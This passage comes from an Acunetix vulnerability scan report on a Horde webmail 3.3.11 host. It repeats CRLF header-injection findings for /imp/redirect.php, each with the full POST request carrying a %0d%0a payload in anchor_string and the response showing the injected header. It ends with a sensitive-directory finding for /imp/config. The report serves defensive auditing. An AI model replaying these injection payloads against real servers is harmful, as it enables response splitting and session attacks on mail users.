HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=ZJEpK9H2Ze2uaBtQUeqRtQM-2Ak&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:30 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 16 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=bsximucj&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=bsximucj&server=pop&horde_logout_token=GadiXsbvwaodw3AzFe7AQtC-kPk&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:43 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=LD9VjI71ABIsj_vDwCCTNjSL-f0&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:43 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 17 |
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=id_ID&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=nqqFHUnbKUnFikwhrKnb0nqQ_lU&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:49 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=bs_BA&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 18 |
Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=aFerm3yAYpGMfgEnBvEx-O-Scy0&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:50 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=kknytbhi&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=kknytbhi&server=pop&horde_logout_token=1WHli2IB81zaNwwisAylSnUjX_Q&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:35 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 19 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&lo |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=SdYSjNlKeYS68QWaYLMXNXYfPHQ&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:46 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=bs_BA&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=05GzsAx9-5mXhwiJBszLaf93Rlg&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:21 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 20 |
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=lyoxhoba&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=lyoxhoba&server=pop&horde_logout_token=n4Vtm9aXdD5x27VmdCUdJq84ad0&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:40 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=tjmxnsfk&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 21 |
Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=tjmxnsfk&server=pop&horde_logout_token=t8tuwVUb1Y1HjaxQOP5Vu5FMfdE&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:38 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=id_ID&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=3GHeLpquhgOw2FTJwtbl9HO1PF8&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:19 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 22 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=bg_BG&pass=acU |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=vaAj0u6O49xJGmk9F4tgkR653Is&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:22 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=zh_CN&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=cH2tRGN-iEYsfI5daccq3hs9Sy0&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:27 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 23 |
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=zh_TW&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=oQlWVBjkvBGzbXadd_d5IjB6vBw&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:28 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ca_ES&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 24 |
Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=jru78BtS52tgFi0k3izOYSvCoHM&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:24 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=cs_CZ&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=UhVzw_mUTmPG8IchsiWhBSiwxac&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:25 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 25 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=T3AWWrhLK2yZWXJXotmXI5tdZ2A&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:16 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ar_SY&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=qHkbYc0eVRGgl8wE4VkEMRJIxQc&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:18 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 26 |
![]() | ||||||||||||||||||
Possible sensitive directories | ||||||||||||||||||
Severity | Low | |||||||||||||||||
Type | Validation | |||||||||||||||||
Reported by module | Scripting (Possible_Sensitive_Directories.script) | |||||||||||||||||
Description | ||||||||||||||||||
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target. | ||||||||||||||||||
Impact | ||||||||||||||||||
This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
Restrict access to this directory or remove it from the website. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/config | ||||||||||||||||||
